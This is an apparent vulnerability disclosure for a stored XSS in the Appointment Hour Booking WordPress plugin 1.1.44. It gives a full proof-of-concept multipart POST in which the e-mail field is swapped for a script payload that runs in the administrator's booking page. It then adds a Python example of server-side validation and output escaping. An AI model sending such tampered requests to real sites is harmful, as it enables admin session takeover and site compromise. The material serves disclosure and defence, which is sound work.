# Vendor Homepage: https://apphourbooking.dwbooster.com/
# Software Link: https://wordpress.org/plugins/appointment-hour-booking/
# Version: 1.1.44
In Appointment Hour Booking – WordPress Booking Plugin it is possible to tamper with the HTTP POST request to bypass the front-end data validation and submit an XSS payload that is stored and later executed in the administrator's web interface.
The attack requires a public appointment booking form. An attacker submits a valid e-mail address in the "E-mail" field, intercepts the request and replaces the address with an XSS payload.
The payload is then executed in the administrator's browser when they open the booking entries page.
This allows an attacker to execute arbitrary JavaScript, resulting in information disclosure, privilege escalation and modification of the site's source code to achieve RCE.
POST /cve/wordpress/ HTTP/1.1
Host: 192.168.0.191
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.191/cve/wordpress/
Content-Type: multipart/form-data; boundary=---------------------------29750584827203
Content-Length: 1451
DNT: 1
Connection: close
Cookie: PHPSESSID=6mefvemchb9mrm2g9dsjd1r3tn; rand_code_1=74617fe239a71a602469791bde16fe49
Upgrade-Insecure-Requests: 1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_pform_psequence"
_1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_appbooking_pform_process"
1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_appbooking_id"
1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_ref_page"
http://192.168.0.191/cve/wordpress/
-----------------------------29750584827203
Content-Disposition: form-data; name="form_structure_1"
-----------------------------29750584827203
Content-Disposition: form-data; name="refpage_1"
http://192.168.0.191/cve/wordpress/
-----------------------------29750584827203
Content-Disposition: form-data; name="fieldname1_1"
2019-07-18 10:00/11:00 0 1
-----------------------------29750584827203
Content-Disposition: form-data; name="fieldname1_1_services"
0
-----------------------------29750584827203
Content-Disposition: form-data; name="fieldname1_1_capacity"
0
-----------------------------29750584827203
Content-Disposition: form-data; name="tcostfieldname1_1"
1.00
-----------------------------29750584827203
Content-Disposition: form-data; name="email_1"
aaa@a.test <== replace by <script>...</script> payload
-----------------------------29750584827203
Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post"
ldqli
-----------------------------29750584827203--
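The root cause described above is that the e-mail field is validated only by front-end JavaScript and then rendered unescaped in the admin booking entries page. The following is an added example, not the plugin's code, showing the two server-side controls that close the issue: re-validating the field on the server (so a tampered request is rejected with a 400) and HTML-escaping every stored value when it is rendered in the admin page (defence in depth if a bad value ever reaches storage). The multipart body is constructed with the same field names and boundary as the PoC request; the minimal parser, the `EMAIL_RE` pattern and the `handle_post`/`render_admin_cell` helpers are assumptions for the example.

```python
"""Server-side validation and output escaping for the booking form POST.
Added example; not the plugin's code.  Field names and the boundary string
follow the PoC request, the data itself is constructed sample data."""
import html
import re

BOUNDARY = "---------------------------29750584827203"  # boundary from the PoC request

# Conservative e-mail syntax check (assumption: stricter than RFC 5322 is fine
# for a booking form).  '<', '>', quotes and whitespace can never match, so a
# tampered "E-mail" field carrying markup is rejected before it is stored.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")


def build_body(email: str) -> bytes:
    """Construct a multipart/form-data body like the PoC request (text fields only)."""
    fields = [
        ("cp_appbooking_pform_process", "1"),
        ("cp_appbooking_id", "1"),
        ("fieldname1_1", "2019-07-18 10:00/11:00 0 1"),
        ("email_1", email),
    ]
    out = b""
    for name, value in fields:
        out += (f"--{BOUNDARY}\r\nContent-Disposition: form-data; "
                f'name="{name}"\r\n\r\n{value}\r\n').encode()
    return out + f"--{BOUNDARY}--\r\n".encode()


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart parser for the PoC-style body.  Returns {name: value}.
    Enough for the example; a real application uses the framework's request object."""
    delimiter = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delimiter)[1:]:      # chunk [0] is the preamble
        if part.startswith(b"--"):              # closing delimiter "--boundary--"
            break
        head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            # the CRLF before the next delimiter belongs to the delimiter, not the value
            value = value.removesuffix(b"\r\n")
            fields[m.group(1).decode()] = value.decode("utf-8", "replace")
    return fields


def validate_booking(fields: dict) -> tuple:
    """Re-check on the server what the front-end JavaScript checked.
    Returns (clean_fields, errors); a non-empty errors list means reject the request."""
    errors, clean = [], {}
    email = fields.get("email_1", "").strip()
    if EMAIL_RE.fullmatch(email):
        clean["email_1"] = email
    else:
        errors.append("email_1: not a valid e-mail address")
    if fields.get("cp_appbooking_id", "").isdigit():
        clean["cp_appbooking_id"] = int(fields["cp_appbooking_id"])
    else:
        errors.append("cp_appbooking_id: must be an integer")
    return clean, errors


def render_admin_cell(value) -> str:
    """Escape a stored value for the admin booking entries page.  Escaping on
    output is applied even to validated data, so a value that bypassed or
    predates validation still cannot run as script."""
    return "<td>" + html.escape(str(value), quote=True) + "</td>"


def handle_post(body: bytes) -> tuple:
    """Simulated request handler: (status, payload).  400 with the error list for
    a tampered request, 200 with the escaped admin-page row for a valid one."""
    clean, errors = validate_booking(parse_multipart(body, BOUNDARY))
    if errors:
        return 400, errors
    row = "<tr>" + "".join(render_admin_cell(v) for v in clean.values()) + "</tr>"
    return 200, row


if __name__ == "__main__":
    print(handle_post(build_body("aaa@a.test")))            # valid booking, escaped row
    print(handle_post(build_body("<script>x()</script>")))  # tampered field, rejected
```

The validation step is what the plugin lacked: the front-end check is advisory only, since the request can be edited after the browser has validated it. The escaping step is independent of it and is the control that matters most, because stored data rendered into an administrator's page must be encoded for the HTML context regardless of how it was validated on the way in.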